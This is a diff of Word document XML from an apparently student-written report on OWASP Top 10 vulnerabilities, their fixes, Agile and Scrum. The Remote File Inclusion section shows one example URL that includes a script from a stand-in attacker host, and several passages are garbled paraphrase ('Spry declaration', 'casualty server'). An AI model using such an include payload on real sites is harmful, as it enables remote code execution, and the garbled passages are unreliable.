+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Server-Side Request Forgery</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>These errors occur when the web application fetches some remote source without validating the URL provided by the user. This allows an attacker to force an application to send handcrafted requests to unexpected destinations. This error has become very serious with the rise of cloud services.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId24" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc116304438"/>
+      <w:r>
+        <w:t>How do we fix these security flaws</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>SQL Injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The following techniques can be used to prevent SQL injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Use statements with parameters.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Allow-list Input Validation</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Input validation should be applied on both syntactical and Semantic level.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Syntactic validation should enforce correct syntax of structured field</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Semantic validation should enforce correctness of their values in the specific business context</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cross-site scripting</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">This </w:t>
+      </w:r>
+      <w:r>
+        <w:t>is a list of techniques to prevent or limit the impact of XSS. No single technique will solve XSS. Using the right combination of defensive techniques is necessary to prevent XSS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ensure that all variables go through validation and are then escaped or sanitized. Any variable that does not go through is a potential weakness.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Remote File Inclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Most RFI assaults against sites are based on the server-side prearranging language PHP. In spite of the fact that PHP isn't the main method for RFI.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://yoursite.com/index.php?page=http://ev.il/badscript.php?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>On the off chance that the content on the casualty server looks like the model from prior, the server will execute the PHP incorporate articulation for the URL: http://ev.il/badscript.php?.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>To forestall this never utilize erratic info information in an exacting record incorporate solicitation. Utilize a channel to clean info boundaries against conceivable record considerations completely. Fabricate a powerful whitelist.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId25" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://www.esecurityplanet.com/endpoint/how-to-prevent-remote-file-inclusion-rfi-attacks/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Password Breach</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Be</w:t>
+      </w:r>
+      <w:r>
+        <w:t>low are some common safeguards</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that can be used to prevent a password breach.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Implement an expiration on passwords so that users need to reset their password after a certain amount of days.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Enforce 2FA (2 factor authentication). This will add an extra layer of security when logging in.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Implement IP whitelisting so that employees can access their accounts only from that whitelisted IP address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Implement logout timers. For example, auto-logout users that are logged in longer than 2 hours.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Broken access control</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Access control is only effective in trusted server-side code or server-less API, where the attacker cannot modify the access control check or metadata.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Deny access to all private resources</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Limit the rate that users can access calls to an API and controller.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Add a control mechanism that can be re-used across the entire application preventing CORS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Security Misconfiguration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Without a concerted, repeatable application security configuration process, systems are at a higher risk.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The following list could help to prevent high risks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>A hardening process that is repeatable makes it fast and easy to deploy an environment that is very secure and locked down. This process should be automated to prevent taking the effort to set up a new secure environment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Remove or uninstall all unnecessary features, components etc that are in production.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Review all configurations to all security updates and notes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable and Outdated Components</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A patch management process should be in place to prevent risks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Remove unused dependencies, unnecessary features, components, files, and documentation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Continuously inventory the versions of both client-side and server-side components</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Obtain libraries or plugins from official sources over secure links. Prefer that the packages are signed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Monitor all libraries and check when there are unmaintained ones.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Identification and Authentication Failures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Below there are some techniques to prevent </w:t>
+      </w:r>
+      <w:r>
+        <w:t>authentication weaknesses</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>When possible, add some sort of multi-factor authentication. Such as 2FA. Anything to prevent something like brute force attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Do not ship with default credentials, such as admin/admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Check passwords for weakness.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Implement a refresh password functionality that employees have to renew their password after let’s say, 30 days.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Limit login attempts after a number of fails.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Software and Data Integrity Failures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The following techniques might help preventing these failures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Use digital signatures to verify that the data is from the source you expected it to come from.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Make sure libraries and dependencies are ingesting trusted repositories.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Make sure that your CI/CD pipeline has great separation, configuration and access control to make sure that the integrity of the code flows through the build and deploy. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Security Logging and Monitoring Failures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Depending on the risk of the application, below are some techniques that could be implemented.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Ensure all login, access control, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Make sure that logs are generated in a format that is easily readable.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Make sure data is encoded properly so that you can prevent injections or attacks in the monitoring system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Server-Side Request Forgery</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Developers can prevent SSRF by implementing some or all the following defence</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Network layer:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Splitting remote resource access functions into separate networks to mitigate the impact of SSRF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Application layer:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Clear and validate all client-supplied data submitted.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Don’t send raw responses to a client.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="26"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Disable HTTP redirections.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sources of the fixes: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId26" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/Top10/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:bookmarkStart w:id="16" w:name="_Toc116304439"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>What is Agile?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="16"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">In short, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Agile is an iterative approach to project management and software development that helps teams deliver value to their customers faster and with fewer headaches. Instead of setting all their sights on a resounding launch, an agile team delivers work in small, but immediately usable, chunks. Requirements, plans and results are continuously evaluated, giving teams a natural mechanism to respond quickly to change.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc116304440"/>
+      <w:r>
+        <w:t>Agile manifesto</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:r>
+        <w:t>mid-2001</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, against the setting of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Wasatch</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Mountains in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Snowbird</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, Utah, US, 17 individuals accumulated to examine the eventual fate of programming advancement. The issue, they concurred, was that organizations were so </w:t>
+      </w:r>
+      <w:r>
+        <w:t>centred</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> around unnecessarily arranging and recording their product advancement cycles that they were neglecting to focus on what truly made a difference: fulfilling their clients. Organizations might have promoted corporate qualities, for example, "greatness" and "trustworthiness," however these qualities did essentially nothing to assist with directing individuals in the correct heading, particularly programming designers. That expected to change. A large number of the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Snowbird</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 17 previously had thoughts regarding how to introduce the new period of programming improvement. The outing to the mountains was their opportunity to examine this inside and out.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The consequence of this long end of the week was the Spry declaration, comprising of only 68 words. Notwithstanding, the short however exceptionally strong report changed programming improvement for eternity. In the almost twenty years since the record was made, these words (and the 12 rules that observed) have been embraced (to fluctuating degrees) by endless people, groups and organizations.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="18" w:name="_Toc116304441"/>
+      <w:r>
+        <w:t>The 12 principles</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="18"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Early and Continuous Delivery of Valuable Software</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Embrace Change</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Frequent Delivery</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Business and Developers Together</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Motivated Individuals</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Face-to-Face Conversation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Working Software</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Sustainable Development</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Technical Excellence</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Simplicity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Self-Organizing Teams</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>R</w:t>
+      </w:r>
+      <w:r>
+        <w:t>egular Reflection and Adjustment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId27" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5635,29 +6371,26 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc114487666"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc116304442"/>
       <w:r>
         <w:t>Scrum</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">In short, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Scrum is a framework that helps teams work together. Like a rugby team training for an important match, teams can use scrums to learn through experiences, organize themselves as they work on a problem and reflect on their successes and mistakes to continually improve themselves.</w:t>
+      <w:bookmarkEnd w:id="19"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>So, Scrum is a system that assists groups with cooperating. Like a rugby crew preparing for a significant match, groups can utilize scrums to learn through encounters, sort out themselves as they deal with on an issue and ponder their victories and missteps to work on themselves constantly.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc114487667"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc116304443"/>
       <w:r>
         <w:t>Sprint</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5669,229 +6402,294 @@
       <w:pPr>
         <w:pStyle w:val="Kop2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc114487668"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc116304444"/>
+      <w:r>
+        <w:t>Agile requirements</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Identifying agile requirements for a project can help teams understand what functions and features the finished product needs to have. It can also help set performance benchmarks so they can determine how well the product functions</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc116304445"/>
+      <w:r>
+        <w:t>Functional requirements</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:t>functional requirement</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> recognizes a capability or highlights the completed item needs to have. Groups utilize this data to figure out what steps they need to take to deliver the ideal item. They can likewise utilize this data to lay out objectives and benchmarks for creation to assist them with keeping tabs on their development.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>A landing page with a customer feedback form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>A search feature that allows users to find past invoices</w:t>
+      </w:r>
